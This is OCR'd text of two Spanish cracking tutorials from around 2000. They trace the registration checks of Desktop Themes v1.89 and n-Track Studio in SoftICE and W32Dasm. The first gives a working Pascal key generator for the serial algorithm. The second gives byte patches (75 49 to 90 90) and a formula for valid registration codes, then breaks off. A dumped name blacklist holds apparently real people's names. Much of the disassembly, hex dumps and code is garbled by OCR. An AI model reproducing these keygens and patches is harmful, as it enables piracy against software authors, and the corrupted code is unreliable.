Continuamos traceando todo éste código hasta que lleguemos a la instrucción 'CALL 00405572' en la posición 
'0040D09D'. Una vea hayamos llegado a ésa instrucción pulsamos F8 para tracear dentro de la función. Una 
vez dentro de la misma éste es el código con el que nos encontramos: 


177 


177 
177 


O” 0:09 000 -0: 0 0 O "“D00 O -O0%0 


177 


137% 
E Der EE 
LTS 
LAT 
LIE 
:004 
177: 
1774 
177: 
LTS 
:004 
:004 
LA 
177: 
177 


:004 


004 
004 
004 
004 
004 


004 
004 
004 
004 


004 
004 
004 


0556F 
05572 
05573 
05575 
0557B 
0557E 
05582 
05583 
05584 
0558B 
05591 
05596 
05597 
05598 
0559E 


055A5 


0010 
EBP 


>Empezamos en ésta instrucción 


EBP,ESP 


ESP, 


00000274 


EAX, 


[EBP+08] 


EBX 
ESI 


DWORD PTR [EBP-04],00 


BYTE 


PTR [EAX+000009A0],00 


ESI, 
EBX, 
EDI 
EBX 
ECX, 


[EAX+000009A0] 
0043041C 


[EBP-0274] 


DWORD PTR [EBP-74],80000002 
DWORD PTR [EBP-30],00000028 


Bueno, seguimos traceando hasta que lleguemos ésta instrucción: 


177 
177 


oo0o0O0o0O0oooOoOo 


177: 
177% 
177: 
LTS 
:004 
:004 
LTS 


004 
004 
004 
004 


004 


O55FB 
O55FE 
05603 
05604 
05609 
0560A 


0560C 


LEA EAX, [EBP-2C] >Pone nuestro Name en EAX 

PUSH 004305F0 

PUSH EAX 

CALL 00426C80 

POP ECX 

TES EAX, EAX 

POP ECX >Esta instrucción es muy interesante 


Como hemos anotado la instrucción 'LEA EAX,[EBP-2C]' pone en el registro EAX lo que hay en la posición de 
memoria apuntada por el registro EBP menos '2C', que es justamente nuestro Name. Ahora vamos a seguir 
traceando otro poco más hasta la intrucción 'POP ECX' que hemos comentado. Efectivamente, es muy 
interesante puesto que recupera de 

la pila el valor '' y lo pone en el registro ECX. Si ahora, en la línea de comandos de Softl CE, escribimos "D 
ECX" y observamos la ventana Data de SoftlCE veremos lo siguiente: 


O: O O: 00 O -O O 


17F: 
17F: 
TES 
17Es 
17F: 
TEES 
17F: 
17F: 


17F: 


004 
004 
004 
004 
004 
004 
004 
004 


004 


305F0 
30600 
30610 
30620 
30630 
30640 
30650 
30660 


30670 


52 48 
52 65 
72 25 


53: 21 
72 25 


57.2 


al] 


72 25 
2E 73 
69 “74 


6F 
67 
44 
73 
44 
13 
44 
79 


69 


6F 
4E 
54 
79 
54 
409 
54 
73 


61 


44 
61 
4C 
73 
4C 
13 
4C 
00 


6C 


00 00 00-52 65 67 43 6F 64 65 00  RHooD...RegCode. 
6D 65 00-25 54 68 65 6D 65 44 69 RegName.%“ThemeDi 
53 53 5F-50 56 54 5C 4C 6F 67 6F  rs$DTLSS_PVIALogo 
00 00 00-25 54 68 65 6D 65 44 69 S.sys...S%ThemeDi 
53 53 5F-50 56 54 5C 4C 6F 67 6F  rs$DTLSS_PVIALogo 
00 00 00-25 54 68 65 6D 65 44 69 W.sys...SThemeDi 
53 53 5F-50 56 54 5C 4C 6F 67 6F  rs$DTLSS_PVIALogo 
00 00 00-4C 6F 67 6F 53 2E 69 6É  .sys....LogoS.in 


00 00 00-25 57 69 6E 64 69 72 25. itial...SWindirS$ 


¿"RHooD"? Suena como si fuera el nick de algún cracker. ¡Qué raro! Bueno, sigamos traceando un poco más 
y veamos qué ocurre. Bueno, pues rápidamente nos cruzamos con el siguiente código: 


177 
177 


177 
177 


0-00 0-0 O O; 00:00:00 00 0.0 


17D 


12473 


004 


:004 
:004 
LFTS 
Lit 
LIE 
177: 


004 
004 
004 
004 


:004 
:004 
177: 
LTTS 
177: 
Lido 
177: 
177: 


004 
004 
004 
004 
004 
004 


004 


05613 
05616 
0561B 
0561C 
05621 
05622 
05624 
05625 
0562B 
0562E 
05633 
05634 
05639 
0563A 
05630 


0563D 


LEA EAX, [EBP-2C] 

PUSH 004305E8 >Manda un valor a la pila 
PUSH EAX >Manda otro valor a la pila 
CALL 00426C80 >Y hace algo 

POP ECX 

TES EAX, EAX 

POP ECX 

JZ 004059B4 

LEA EAX, [EBP-2C] 

PUSH 004305DC 

PUSH EAX 

CALL 00426C80 

POP ECX 

TES EAX, EAX 

POP ECX 

JZ 004059B4 


Bien. Analicemos las instrucciones que hemos comentado. La instrucción 'PUSH 004305E8' en la posición 


'00405616' envía algo a la pila. Si en la línea de comandos de Softl CE escribimos "D 004305E8" veremos en 
la ventana Data lo siguiente: 


017F:004305E8 72 6F 6D 65 6F 00 00 00-52 48 6F 6F 44 00 00 00  romeo...RHooD... 
017F:004305F8 52 65 67 43 6F 64 65 00-52 65 67 4E 61 6D 65 00.  RegCode.RegName. 
017F:00430608 25 54 68 65 6D 65 44 69-72 25 44 54 4C 53 53 5F %ThemeDirs*DTLSS_ 
017F:00430618 50 56 54 5C 4C 6F 67 6F-53 2E 73 79 73 00 00 00 PVINLogoS.sys... 
017F:00430628 25 54 68 65 6D 65 44 69-72 25 44 54 4C 53 53 5F %ThemeDirsDTLSS_ 
017F:00430638 50 56 54 5C 4C 6F 67 6F-57 2E 73 79 73 00 00 00 PVINLogoW.sys... 
017F:00430648 25 54 68 65 6D 65 44 69-72 25 44 54 4C 53 53 5F %ThemeDirs%DTLSS_ 
¡Vaya, vaya! "romeo" ... "RHooD". Esto ya se aclara. Tiene toda la pinta de que nos encontramos con una 


'lista negra'. 'romeo' es un cracker famoso en la red. ¡A éste sí que lo conozco y he leído ensayos suyos! Lo 
que está haciendo el programa es comprobar si el Name que hemos introducido coincide con alguno de los de 
la "lista negra'. ¡Con toda probabilidad en el registro EAX esté nuestro Name y lo envía a la pila como uno de 
los dos parámetro que se pasan a la función de la instrucción siguiente (el 'CALL 00426C80'). Efectivamente 
si escribimos en la línea de comando de SoftlCE "D EAX" en la ventana Data veremos nuestro Name: 
"MeGaBiTe". 


Podemos observar además que el código va leyendo valores de la 'lista negra' hacia atrás, es decir, de las 
posiciones de memoria más altas a las más bajas. Por lo tanto vamos a pulsar, dentro de Softl CE, la 
combinación de teclas Alt-RePág y veremos lo siguiente: 


17F:00430408 2F 63 6F 6ÉE 76 00 00 00-2F 69 6E 73 74 61 6C 6C.” /conv.../install 
17F:00430418 00 00 00 00 53 6F 66 74-77 61 72 65 5C 4C 65 66  ....SoftwarelLef 
17F:00430428 74 20 53 69 64 65 20 53-6F 66 74 77 61 72 65 5C” t Side Software 
17F:00430438 44 65 73 6B 74 6F 70 20-54 68 65 6D 65 73 00 00 Desktop Themes... 
17F:00430448 4C 61 6É 67 75 61 67 65-00 00 00 00 54 68 69 73  Language....This 
17F:00430458 20 70 72 6F 67 72 61 6D-20 72 65 71 75 69 72 65 program require 
17F:00430468 73 20 57 69 6E 64 6F 77-73 20 39 35 2F 4E 54 20 s Windows 95/NT 


17F:00430478 
17F:00430488 
17F:00430498 4 


[09 
H> 
N 


30 2E 00 00 00 00-46 6€C 61 67 73 32 00 00 4.0..... Flags2.. 
9 73 65 20 4E 69 65-6C 73 65 6E 00 00 00 00. Lise Nielsen.... 
69 61 6É 61 20 4B 65-6C 6C 65 72 00 00 00 00 Diana Keller.... 


Ps 
Q 
dd 


17F:004304A8 45 6E 72 69 71 75 65 20-52 6F 73 61 72 69 6F 00 Enrique Rosario. 
17F:004304B8 4E 61 74 65 20 50 61 63-6B 65 72 00 44 69 65 67. Nate Packer.Dieg 
17F:004304C8 6F 20 4D 6F 6E 74 65 73-00 00 00 00 4B 65 6E 6E o Montes....Kenn 
17F:004304D8 65 74 68 20 42 6C 61 6E-73 65 74 74 65 00 00 00. eth Blansette... 
17F:004304E8 43 6F 6D 70 61 71 20 43-4F 2E 00 00 53 54 61 52 Compaq CO...STaR 
17F:004304F8 44 6F 47 47 00 00 00 00-57 69 6C 6C 69 61 6D 20  DoGG....William 


17F:00430508 
17F:00430518 
17F:00430528 
17F:00430538 
17F:00430548 
17F:00430558 
17F:00430568 
17F:00430578 


67 65 72 73 00 00-4A 65 66 66 65 72 79 20 Rogers. .Jeffery 
69 74 74 6F 00 00 00-42 6F 62 20 4A 6F 6E 65 Ditto...Bob Jone 
00 00 00 4C 6F 76 65-72 20 42 6F 79 00 00 00  s...Lover Boy... 
69 6C 6C 20 4D 61 79-65 72 00 00 54 69 6D 20 Bill Mayer..Tim 
6F 64 72 69 67 75 65-73 00 00 00 64 65 6C 6F  Rodrigues...delo 
20 61 6C 61 69 6E 00-53 74 65 76 65 20 53 65 n alain.Steve Se 
65 72 64 6A 69 61 6E-00 00 00 00 41 6C 62 65 merdjian....Albe 
74 6F 20 41 20 4A 75-6E 69 6F 72 00 00 00 00. rto A Junior.... 


a 
NUHONNOER Nas 00d sas 
d 
H 


ZJ 00 01ds Js 


S- SO0:OvO0 10 Oy 0-00 O 00 0-00 0:O"S 00 -O0: 0/00 OO O 


17F:00430588 4A 6F 68 6E 20 46 6F 72-72 65 6C 6C 69 00 00 00 John Forrelli... 
17F:00430598 52 69 63 61 72 64 6F 20-47 6F 75 76 65 61 20 4D Ricardo Gouvea M 
17F:004305A8 65 6E 64 6F 6E 63 61 00-44 65 62 72 61 20 43 2E  endonca.Debra C. 
17F:004305B8 20 4D 61 79 6E 65 00 00-43 68 6F 6F 69 20 47 75 Mayne..Chooi Gu 
17F:004305C8 61 6E 00 00 52 6F 6E 61-6C 64 20 4A 20 53 6F 75 an..Ronald J Sou 
17F:004305D8 74 61 72 00 66 41 43 54-4F 52 20 27 39 38 00 00  tar.fACTOR '98.. 


¡Bueno, ya no hay duda! Nos encontramos, efectivamente con una "lista negra". El autor del software se ha 
dedicado a perder un poco de tiempo localizando Serial Numbers en la red (por cierto, hay un auténtico 
montón) y ha escrito el código necesario para que si introducimos un Name de los que circulan por ahí nos 
muestre el mensaje de error. Aunque también puede ser que nos muestre un mensaje de error en relacción 
con ésto que estamos hablando; la verdad es que no lo he comprobado. Además, si nos fijamos, durante toda 
ésta parte del código en la que se van cargando nombre de la "lista negra' se llama constantemente a la 
misma función con nuestro Name en el registro EAX y con el Name que se está extrayendo de la 'lista negra' 
apuntado por el registro ECX; concretamente es un CALL a la posición de memoria '00426C80'. 


Bueno, seguimos traceando con la tecla F10 hasta que lleguemos a la posición de memoria '0040588B'; en 
éste posición se inicia un bucle en el que se va recorriendo nuestro Name carácter a carácter. Lo que sigue es 
el código completo del bucle (antes de la primera instrucción, el registro ECX contendrá la longitud del Name 


que hayamos introducido; en mi caso 8) 


:0040588B 0FBE5405D4 


Name en 


:00405890 8BF8 
contador, 


0; 


índice al 


:00405892 83E701 


el 
registro 
si 


:00405895 47 


:00405896 OFAFD”7 


por 


:00405899 03D0 


multiplicación 


contador 


:0040589B 0155FC 


:0040589E 40 
:0040589F 3BC1 


:004058A1 72E8 


movsx edx, byte ptr [ebp+eax-2C] 


mov edi, eax 


and edi, 00000001 


inc edi 
imul edx, edi 


add edx, eax 


add dword ptr [ebp-04], edx 
inc eax 
cmp eaxX, ecx 


jb 0040588B 


>Pone el primer carácter del 


>el registro EDX 
>El registro EAX actúa como 


>en el primer ciclo de bucle es 


>ésta instrucción mueve el 


>registro EDI 
>AND lógico del registro EDI; si 


>índice del contador en el 
>es par dará '0' como resultado; 
>es non dará '1' como resultado 


>Incrementa EDI 
>Multiplica el carácter del Name 


>EDI, que será '1l' o '2' 
>A1 resultado de la 


>anterior, se le añade el 
>Guarda el resultado en [EBP-04] 


>Incrementa el contador 
>¿Estamos al final del bucle? 


>Si no es así, repetir 


Bueno, después de que se ejecute completamente éste bucle, tendremos un valor guardado en la posición de 
memoria '[EBP-04]'. En mi caso éste valor es '046E'. Veamos lo que sucede ahora con éste valor: 


0177:004058A3 
en 


"82644404" 
0177:004058AA 
0177:004058AC 


0177:004058AF 
EAX 
0177:004058B1 
en 


XOR 


DWORD PTR [EBP-04],82644404 


004058B4 
EAX, [EBP-04] 


EAX 


=— 


EBP-04],EAX 


>Hace un XOR del valor guardado 


>[EBP-04] con la constante 


> 
>Mueve el resultado de XOR al 
>registro EAX 

>Calcula el completo a dos de 


>Y vuelve a guardar el resultado 


> [EBP-04] 


Seguimos traceando el programa con F10 y rápidamente llegamos a éste trozo de código; el más crítico: 


0177:004058C6 
0177:004058CD 
0177:004058D0 
0177:004058D1 
que 


registro EAX 
0177:004058D6 
Serial 


que 


CMP 


DWORD PTR [EBP-04],00002B0D 
EAX, [EBP-70] 

EAX 
0041E795 


— 


EBP-04],EAX 


Si observamos la ventana Registers veremos lo siguiente: 


V 


Este CALL pone el Serial Number 


>hemos introducido en el 
>Y aquí se compara nuestro 


>Number, falso, con el auténtico 


>está guardado en [EBP-04] 


EAX=00123456 EBX=0043041C ECX=00435432 EDX=000000D1 ESI=00684BE0O 
EDI=00000002 EBP=0066EE5C ESP=0066EBD8 EIP=004058D6 odIlszApc 


Ccs=017"7 DS=017F ss=017E ES=017E FrSs=12A7 GSs=0000 SS:0066EE58=7D9BBF96 


¿Puede ver el contenido del registro EAX? Es '123456' que es el valor hexadecimal del valor decimal 
'1193046'. Y en la última línea, a la derecha, veremos el contenido de la posición de memoria '[EBP-04]', que 
'7D9BBF96'. Vamos a ponerlo en claro: ésta instrucción lo que hace es compara el valor hexadecimal del 
Serial Number que hemos introducido con otro valor. Por lo tanto lo único que nos resta hacer es convertir 
ése valor a decimal, y tendremos el Serial Number necesario para registrar el programa con nuestro Name. 


Por lo tanto, '7D9BBF96' hexadecimal, en decimal es '2107359126'. ¡Que es el Serial Number auténtico! 


El parche 


En realidad no necesitamos ningún parche. Con la información que poseemos podemos, perfectamente hacer 
un Key Generator. 


¡Aquí está; un Key Generator! Por cierto, es el primero que hago. ¡Disculpen los errores si los hay; aunque 
creo que no! Una última cuestión: el Key Generator no comprueba si se ha introducido ningún valor como 
Name; ésto es así por que, aunque en Desktop Themes no introduzcamos un Name, si le proporcionamos el 
Code adecuado, se registra. ¡Un poco rarillo, pero así es. 


ARA OOOO OOOO OOOO Cortar por 
ETE EEE EEE EEE EE TEE ETE TEE E TEE ETE TEE ETEETES 
aquí 


Program dtKG; 


Uses Crt; 

Var nombre : String[20]; 
i : integer; 
Xx : integer; 
serial : longlnt; 

Begin 


ClrScr;TextColor (White) ;¡Write('Key Generator by '); 
TextColor (LightRed) ¡Write ('MeG');TextColor (Yellow); 
Write('aB');TextColor (LightRed) ¡Writeln('iTe'); 
TextColor (15) ;¡writeln('Desktop Themes v1.89');¿WritelLn; 
TextColor (7) ;Write('Introduzca su nombre: '); 


TextColor (15) ;ReadLn (nombre) ; 


for i := 0 to length(nombre)-1 do 
begin 
Xx := i AND 1; 
XxX >Sx +1 
serial := serial+(x*ORD (nombre[1+1])); 
serial := serial+i; 
end; 
serial := serial XOR $82644404; 
serial := (not serial)+1; 
TextColor (7); 
write('Corresponde el Code: 0 
TextColor (15);Write(serial); 
ReadKey 
End. 


AAA ARO OOOO OOOO Cortar por 
AE TEE ETE EEE TEE ETE TEE EE TE TE TEE TEE TE EEE TE TEE EEETES 
aquí 


Final Notes 


Me gustaría saludar a mis crackers favoritos y de los que más he aprendido. Son éstos: 


Torntdo, The SandMan, BalckB, +Fravia, TNT!, ECD, Karpof, Wkt. Esto no quiere decir que no haya otros extraordinarios 
crackers. 


NOTA: Si le gusta el programa, cómprelo. Los programadores pierden demasiado tiempo desarrollando su software como 
para que vengamos nosotros y no les compensemos por su trabajo. ¡No es justo! 


Ensayo por: MeGaBiTe 
Página creada: 06/05/2000 


Karpoff Spanish Tutor 


Programa: N-Track Studio vl1.3.3 


PROTECCION: Name/Serial y limitación de tiempo (40 días). 
Descripcion: Utilidad para la creación de música. 

Dificultad: Principiante+ 

DOWNLOAD : http://199.217.92.26/dnload/ntrack.exe 

Herramientas: Softice(ó TRW2000), W32dasm y un editor hexadecimal. 
CRACKER: <KeKo> FECHA: 22/8/2000 


INTRODUCCION 


Hola colegas. Primero quiero decir que este es el primer tutorial que escribo, así que 
perdonadme si hay algún error. Llevo en esto sólo tres semanas, y como todo lo que 
sé (que es muy poco), lo he aprendido en tutoriales (sobre todo los del maestro 
Karpoff, que recomiendo), me he decidido a escribir uno por si puedo ayudar a 
alguien a dar sus primeros pasos. 

He elegido este programa porque me ha dado bastante la lata y porque es algo más 
complicado que cambiar un par de saltos ;). 


AL ATAKE 


Bueno, supongo que sabeis cómo se preparan las cosas ¿no?: Primero cargais el Soft-Ice si 
no lo habeis hecho ya, y luego instalais el programa, haceis una copia del ejecutable 


(ntrack.exe) y abríis esa copia con el w32dasm y con el editor hexadecimal. Bien, todo listo 
para empezar :). 


Voy a ir contando todo lo que hice, lo que salió mal también, porque creo que es 
interesante. Además como en muchos tutoriales no ponen los fallos, parece que siempre se 
acierta a la primera, y cuando tú no aciertas a la primera (ni a la segunda ;)), crees que lo 
haces mal. Si quereis saltaros esto e ir directamente a la solución correcta, sólo teneis que 


buscar una flecha como esta: --> 


Lo primero que se me ocurrió fué seguir el camino habitual, es decir, introducir un número 
cualquiera en el registro (bueno, en este caso son dos números), tomar nota del mensaje de 
error ("Wrong registration data. Please make sure ........ "), y buscarlo en el w32dasm. Lo que 
encontré fué lo siguiente: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 
1:0042E515(C), :0042E578(C) 


:0042E5D9 8B7508 mov esi, dword ptr [ebp+08] 
:0042E5DC 6A40 push 00000040 


* Possible StringData Ref from Data Obj ->"Registration" 


| 
:0042E5DE 6844134700 push 004713A4 


* Possible StringData Ref from Data Obj ->"Wrong registration data. Please " 
->"make sure you're typing the codes " 
->"correctly. To be sure simply copy " 
->"and paste the codes into the registration " 


->"dialog box." 
| 
:0042E5E3 6874124700 push 00471274 
:0042E5E8 56 push esi 


Aquí podemos ver el mensaje de error y desde donde se accede a él. Busquemos por tanto 
esas direcciones (42E515 y 42E578): 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0042E5F6(U) 

| 

:0042E50F 81FF88130000 cmp edi, 00001388 

:0042E515 OF8DBE000000 ¡nl 0042E5D9 <- Aquí está la primera 
:0042E51B 8D8DECFEFFFF lea ecx, dword ptr [ebp+FFFFFEEC] 
:0042E521 33F6 xor esi, esi 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:0042E53C(U) 

| 

:0042E523 8A01 mov al, byte ptr [ecx] 

:0042E525 84C0 test al, al 

:0042E527 7415 je 0042E53E 

:0042E529 3C30 cmp al, 30 

:0042E52B 7C11 ¡1 0042E53E 

:0042E52D 3C39 cmp al, 39 

:0042E52F 7FOD jg 0042E53E 

:0042E531 OFBECO movsx eax, al 

:0042E534 8D14B6 lea edx, dword ptr [esi+4*esi] 
:0042E537 41 inc ecx 

:0042E538 8D7450D0 lea esi, dword ptr [eax+2*edx-30] 
:0042E53C EBE5 ¡mp 0042E523 


* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 


1:0042E527(C), :0042E52B(C), :0042E52F(C) 


| 
:0042E53E 8D95ECFDFFFF lea edx, dword ptr [ebp+FFFFFDEC] 
:0042E544 33C9 XOr eCX, ecx 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0042E55F(U) 

| 

:0042E546 8A02 mov al, byte ptr [edx] 
:0042E548 84C0 test al, al 

:0042E54A 7415 je 0042E561 

:0042E54C 3C30 cmp al, 30 

:0042E54E 7C11 j¡l 0042E561 

:0042E550 3C39 cmp al, 39 

:0042E552 7FOD jg 0042E561 

:0042E554 OFBECO movsx eax, al 

:0042E557 8DOC89 lea ecx, dword ptr [ecx+4*ecx] 
:0042E55A 42 inc edx 

:0042E55B 8D4C48D0 lea ecx, dword ptr [eax+2*ecx-30] 
:0042E55F EBE5 ¡mp 0042E546 


* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 
1:0042E54A(C), :0042E54E(C), :0042E552(C) 


| 
:0042E561 33C0 xor eax, eax 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0042E57B(U) 

| 

:0042E563 83F808 cmp eax, 00000008 

:0042E566 7315 ¡nb 0042E57D 

:0042E568 3B34C574104700 cmp esi, dword ptr [8*eax+00471074] 
:0042E56F 7509 ¡ne 0042E57A 

:0042E571 3B0CC578104700 cmp ecx, dword ptr [8*eax+00471078] 
:0042E578 745F je 0042E5D9 <- Y aquí la segunda. 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:0042E56F(C) 

| 

:0042E57A 40 inc eax 

:0042E57B EBE6 ¡mp 0042E563 


Lo primero que se nos ocurre (al menos a mi), es eliminar esos saltos con el editor 
hexadecimal para que el programa siga su curso sin saltar al mensaje de error. En este caso 
eso no funciona, y os aconsejo que no lo probeis, porque el programa se queda colgado, ya 
que habremos creado un bucle infinito. 

Si miráis un poco más abajo del mensaje de error, os encontraréis con lo siguiente: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0042E5D7(C) 

| 

:0042E5FB 8D4DEC lea ecx, dword ptr [ebp-14] 
:0042E5FE 68989B4600 push 00469B98 
:0042E603 51 push ecx 

:0042E604 895DEC mov dword ptr [ebp-14], ebx 


* Reference To: MSVCRT._CxxThrowException, Ord:0041h 


| 
:0042E607 E804860300 Call 00466C10 


:0042E60C 8B450C mov eax, dword ptr [ebp+0C] 
:0042E60F 85C0 test eax, eax 

:0042E611 OF85AE000000 ¡ne 0042E6C5 
:0042E617 8B5D08 mov ebx, dword ptr [ebp+08] 
:0042E61A 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"Registration succesful!" 
| 
:0042E61C 685C 124700 push 0047125C 


* Possible StringData Ref from Data Obj ->"Thank you for registering n-Track " 
->"Studio" 


:0042E621 6830124700 push 00471230 
:0042E626 53 push ebx 


Por eso mi segunda idea fué buscar el salto que llega aquí (42E5D7), y cambiarlo por un 
JMP para que salte siempre. ¿Sabeis cómo, verdad? En el w32dasm se hace doble click en la 
línea donde está el salto, luego se mira el offset en la línea inferior y se introduce ese offset 
en el buscador del editor hexadecimal (Ctrl+G). Para cambiarlo a un JMP basta sustituir el 
74 22 (je) por un EB 22 (¡mp). 

En este caso simplemente no hace nada. Sigue apareciendo el mensaje de error. ¿Por qué?. 
Pues porque el programa nunca llega a ejecutar ese salto. Podeis pensar que sólo tenemos 
que cambiar un par de saltos para dirigir el programa hacia ese punto y ya está, pero en este 
caso no es así. Veámoslo: 

Si teneis el programa desensamblado delante y lo estudiais un poco, vereis que algo más 
arriba hay un salto que pueden desviarnos del que hemos cambiado (el 42E5D7), y es: 
:0042E5AA 7549 jne 0042E5F5 

Bien, vamos a anularlo, es decir, en el edito hexadecimal cambiamos 75 49 por 90 90. 
Ahora ejecutamos el programa, metemos una clave cualquiera y.... "Thank you for 
registering n-Track Studio". Bieeeen, Vivaaaa. Pero un momento, si pulsamos Help-About, 
veremos de nuevo UNREGISTERED SHAREWARE, y lo mismo si cerramos el programa 
y lo volvemos a abrir. ¿Qué sucede?. Pues que hemos conseguido que salga el mensaje de 
registración, pero sin que el programa cambie los datos. Es decir, que sólo hemos cambiado 
un mensaje por otro, pero el programa sigue sin registrarse. 


--> Este es el momento de usar métodos más fuertes, es decir, nuestro gran amigo el Soft- 
Ice. Para ello borramos la copia modificada del programa y hacemos otra copia nueva del 
original para que no esté cambiada. Ahora vamos a la ventana de registro e introducimos 
unos datos cualesquiera. En mi caso: 
Your name: <KeKo> 
Reg. Code 1: 222222222 
Reg. Code 2: 444444444 

Vamos al Sice (=Soft-Ice), y ponemos un par de breakpoints para probar: — bpx 
getwindowtexta y bpx getdlgitemtexta. Volvemos al programa y pulsamos OK. Saltamos 
al Sice y vemos que el bpx que funciona es bpx getdlgitemtexta (por si lo volvemos a 
necesitar). Primero, ya que el programa tiene que leer tres datos, pulsamos F3 dos 


veces(cada vez que aparecemos en el Soft-Ice es porque lee un dato, luego tenemos que salir 
del Sice dos veces pulsando F5 para que así tenga leidos los tres datos la tercera vez que 
aparece la ventana del Soft-Ice ¿OK?). Ahora estamos en USER32.DLL, pero lo que 
queremos es estar en el ejecutable ntrack.exe, así que pulsamos una vez F12 para salir de 
esta subrutina, y ya nos encontramos en el ntrack.exe. Observaréis que aparecemos muy 
lejos de donde estuvimos trabajando con el w32dasm, así que hay que pulsar F10 como 
locos hasta que lleguemos a: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


[:0042E5F6(U) 

| 

:0042E50F 81FF88130000 cmp edi, 00001388 

:0042E515 0OF8DBE000000 ¡nl 0042E5D9 

:0042E51B 8D8DECFEFFFF lea ecx, dword ptr [ebp+FFFFFEEC] 
:0042E521 33F6 xor esi, esi <--- Parad aquí 


que era el primer salto al mensaje de error. En lugar de pulsar F10 tantas veces, podeis poner 
un breakpoint en esa línea (bpx 42E50f) y pulsar FS (primero borrad los otros bpx) y ya 
estaréis aquí. 

Os preguntaréis qué hace el programa en todas esas líneas que nos hemos saltado. Bien, lo 
que hace es comparar nuestra clave con otras de versiones anteriores del programa, y si 
coinciden, nos sale un mensaje diciendo que mandemos un e-mail para recibir las claves 
nuevas, pero para eso hay que estar registrado :). Podeis intentar encontrar esas claves como 
ejercicio. Yo lo hice creyendo que eran las actuales. ¡Vaya chasco! ;) 

Bueno, una vez llegados a este punto, si comprobamos el valor que se le asigna a ECX en 
la línea 0042E51B (escribiendo d ecx) veremos nuestro Registration Code 1. Esto empieza a 
ponerse interesante... Ahora os describo las siguientes líneas: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0042E53C(U) 

| 

:0042E523 8A01 mov al, byte ptr [ecx] <---Toma el primer número de nuestro code 
:0042E525 84C0 test al, al <--- Comprueba que no es el último 

:0042E527 7415 je 0042E53E <--- Si es el último,salta. 

:0042E529 3C30 cmp al, 30 <--- Comprueba que es mayor que 0, 30 en hexadecimal 
:0042E52B 7C11 j¡l0042E53E <--- Si es menor, salta. 

:0042E52D 3C39 cmp al, 39<--- Comprueba que es menor que 9, 39 en hexadecimal 
:0042E52F 7FOD jg 0042E53E<--- Si es mayor,salta. 

:0042E531 OFBECO movsx eax, al<--- Opera con el número 

:0042E534 8D14B6 lea edx, dword ptr [esi+4*esi] 

:0042E537 41 inc ecx 

:0042E538 8D7450D0 lea esi, dword ptr [eax+2*edx-30] 

:0042E53C EBE5 ¡mp 0042E523 


Que sea menor que cero o mayor que nueve en hexadecimal quiere decir que no es un 
número, sinó una letra o un signo. Por tanto si en nuestros codes hay letras o signos, salta y 
acaba mostrando el mensaje de error. Sólo puede haber números. Comprueba número a 
número hasta que llega al último y salta en: 

:0042E527 7415 je 0042E53E <--- Si es el último,salta. 


Las operaciones lo que hacen es ir guardando en EST nuestro code, en mi caso el 
222222222, 


Una vez comprobado que no hay más que números en nuestro code, podreis ver con el Soft- 
Ice que vuelve a repetir el proceso con el Registration Code 2, y lo guarda en ECX. 

Ahora el programa hace ciertas operaciones con EAX que a nosotros no nos interesan. 
Después de esto, repite el proceso anterior con el Reg. Code 1, y guarda su valor en ECX. 
Realmente no sé para qué vuelve a repetir el proceso, pues hace exactamente lo mismo de 
antes, pero en lugar de guardar el número en ESTI, lo guarda en ECX. El caso es que después 
tenemos lo siguiente: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 
1:0042E589(C), :0042E58D(C), :0042E591(C) 


| 
:0042E5A0 8BD7 mov edx, edi 


:0042E5A2 69D2FDDB0400 imul edx, 0O04DBFD 

:0042E5A8 3BD1 cmp edx, ecx 

:0042E5AA 7549 ¡ne 0042E5F5 

:0042E5AC 8D95ECFDFFFF lea edx, dword ptr [ebp+FFFFFDEC] 
:0042E5B2 33C9 XOr €CX, €CX 


Primero copia el valor de EDI (que si hacemos d edi veremos que es 1001) en edx, y luego 
multiplica EDX por 4DBFD (y si ponemos ?4DBFD vemos que en decimal es 318461). Por 
último compara el valor con ECX, que es nuestro Registration Code 1 (en mi caso 
222222222). Si no son iguales salta a 42E5E5: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0042E5AA(C) 


| 
:0042E5F5 47 inc edi 
:0042E5F6 E914FFFFFF ¡mp 0042E50F 


Allí, como podemos ver, se le suma 1 a EDI, y se salta a 42E50F, que es precisamente 
donde paramos el Soft-Ice la primera vez después de pulsar F10 muchas veces. Si no lo 
recordáis, id unas líneas más arriba, donde empecé a hablar del Soft-Ice y vereis que esa 
dirección está impresa. Lo que hace allí es comprobar que EDI todavía no vale 5000 (que es 
1388 en hexadecimal). Si lo es salta al error, y si no vuelve a repetirlo todo pero con EDI 
una unidad mayor. 

Es decir, para que no de error, nuestro code debe ser igual a 318461 multiplicado por un 
valor entre 1001 (el primer valor de EDI) y 5000 (el último). Como el que yo he introducido 
(222222222) no es así, al final dará error. Salimos por tanto del Sice he introducimos un 
número que cumpla esos requisitos, por ejemplo el 707620342 (que resulta de multiplicar 
318461 por el 2222, que está entre 1001 y 5000). Lo mejor es que useis vuestro propio 
número para practicar. Escojed un número cualquiera entre 1001 y 5000, multiplicado por 
318461 y ya tendréis un número válido para el Registration Code 1. Ahora volvemos a la 
pantalla de registración e introducimos los nuevos datos. En mi caso: 

Your name: <KeKo> 
Reg. Code 1: 707620342  <--- El número que acabamos de calcular. 
Reg. Code 2: 444444444  <--- Uno cualquiera. 

Y volvemos al Soft-Ice. Para no dar tantas vueltas, podemos poner bpx 42E5A2, e iremos 

directamente a donde lo dejamos antes: 


:0042E5A2 69D2FDDB0400 imul edx, 0OO4DBFD <-- Aquí es donde lo dejamos 


:0042E5A8 3BD1 cmp edx, ecx 


:0042E5AA 7549 ¡ne 0042E5F5 
:0042E5AC 8D95ECFDFFFF lea edx, dword ptr [ebp+FFFFFDEC] 
:0042E5B2 33C9 XOr €CX, €CX 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:0042E5CD(U) 

| 

:0042E5B4 8A02 mov al, byte ptr [edx] 
:0042E5B6 84C0 test al, al 

